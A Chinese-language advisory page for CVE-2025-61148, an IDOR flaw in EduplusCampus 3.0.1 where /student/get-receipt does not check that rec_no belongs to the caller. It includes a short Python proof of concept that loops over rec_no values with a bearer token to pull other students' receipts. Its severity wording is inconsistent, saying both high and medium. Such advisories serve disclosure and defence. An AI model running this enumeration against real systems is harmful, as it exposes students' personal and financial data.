CVE-2025-61148 CVSS 6.5 中危

CVE-2025-61148: EduplusCampus 3.0.1 IDOR漏洞可导致学生财务记录泄露

披露日期: 2025-12-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-61148

漏洞类型

IDOR（不安全的直接对象引用）

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

EduplusCampus 3.0.1

漏洞概述

CVE-2025-61148是EduplusCampus 3.0.1版本中的一个高危IDOR漏洞，存在于学生支付API接口中。该漏洞允许已认证用户通过修改API请求中的rec_no参数，非法访问其他学生的个人信息和财务记录。攻击者利用此漏洞可获取大量敏感数据，包括但不限于学生身份信息、缴费记录等。由于该漏洞无需特殊权限即可利用，且对机密性影响极高，因此被评定为中危级别。

技术细节

该漏洞源于EduplusCampus的学生收据API端点（/student/get-receipt）未对用户提交的rec_no参数进行充分的权限验证。系统仅检查用户是否已登录，但未验证请求的rec_no是否属于当前用户。攻击者可枚举rec_no值来批量获取其他学生的收据信息，包括个人资料和财务数据。

攻击链分析

STEP 1

获取目标系统的有效认证令牌

STEP 2

访问/student/get-receipt端点并提交rec_no参数

STEP 3

通过枚举rec_no值来获取其他学生的收据信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target = 'http://target.com/student/get-receipt'
headers = {'Authorization': 'Bearer <token>'}

for i in range(1, 100):
    payload = {'rec_no': i}
    resp = requests.post(target, json=payload, headers=headers)
    if resp.status_code == 200:
        print(f'Found record: {resp.json()}')

影响范围

EduplusCampus 3.0.1

防御指南

临时缓解措施

在发布修复版本前，可通过API网关实施临时访问控制

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表